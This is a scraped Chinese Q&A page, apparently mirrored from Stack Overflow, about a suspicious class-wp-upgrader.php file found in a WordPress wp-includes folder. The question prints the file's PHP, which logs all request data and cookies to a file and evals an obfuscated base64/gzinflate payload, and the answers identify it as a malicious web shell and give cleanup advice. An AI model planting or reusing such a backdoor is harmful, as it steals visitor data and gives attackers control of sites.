Warning: file_get_contents(/data/phpspider/zhask/data//catemap/1/php/275.json): failed to open stream: No such file or directory in /data/phpspider/zhask/libs/function.php on line 167

Warning: Invalid argument supplied for foreach() in /data/phpspider/zhask/libs/tag.function.php on line 1116

Notice: Undefined index: in /data/phpspider/zhask/libs/function.php on line 180

Warning: array_chunk() expects parameter 1 to be array, null given in /data/phpspider/zhask/libs/function.php on line 181
在wp include文件夹中找到class-wp-upgrader.php_Php_Wordpress_Security - Fatal编程技术网
Fatal编程技术网
  • php/
  • 在wp include文件夹中找到class-wp-upgrader.php

在wp include文件夹中找到class-wp-upgrader.php

php wordpress security

在wp include文件夹中找到class-wp-upgrader.php,php,wordpress,security,Php,Wordpress,Security,我在wp include中发现一个名为class-wp-upgrader.php的文件,其中包含一些奇怪的代码: <?php error_reporting(0); ob_start(); var_dump($_POST, $_GET, $_COOKIE, $_FILES); $output = ob_get_clean(); $fp = fopen('./error_log', 'a'); fwrite($fp, print_r($output, TRUE)); fclose($fp);

我在wp include中发现一个名为class-wp-upgrader.php的文件,其中包含一些奇怪的代码:

<?php error_reporting(0); ob_start(); var_dump($_POST, $_GET, $_COOKIE, $_FILES); $output = ob_get_clean(); $fp = fopen('./error_log', 'a'); fwrite($fp, print_r($output, TRUE)); fclose($fp); ob_end_clean(); eval(gzinflate(base64_decode("1X39e9q40ujP3efZ/0H1yVnDlhAgTbcJJWm+Q5omachX0+RyjDHgYrDXhpC0p//7nRlJtvwBId3d9753z3MaLI1Go9HXaDQz2lh/t+H1vF9/Wfr9919/Yb+zq8YJq/BfVos1epbjsNYjc89amLj06y//WjDGo17TM4KA1Zj2ZtlY7ZQs449Wa/VtaaX0x+qb1pvXq9bblddvy29fr2jVX39ZMF3H9RH6X+0OT2lbHWPsjJqGObLdIWTpe7ZjBR+NoQ7Z7yHbHlo5vbF7tNc83Tw/0Aus2dyrH+02m3kAwP/ZnRwLRr7nBrmFZmP37HL37It+cH5+2ryAr+bm/u7xuX5X0Pddt+tYep69rNVYx3ACi+XZ919/edGzjLbl56jMUrlYYq9Lr9mxO2J[...]ZBlj99ZeN9f8L")));
无论是什么,它都不是默认Wordpress代码的一部分

您应该删除该文件,更改Wordpress安装和数据库中所有用户的密码,并检查您的网站,寻找可能的入口点。如果尚未升级,请将Wordpress升级到最新版本。

是。这是一些恶意脚本试图做一些肮脏的事情。感谢回复,我发现这像一个洞网站管理器文件的东西,这个脚本做所有操作编辑,更新,删除,chmod。。。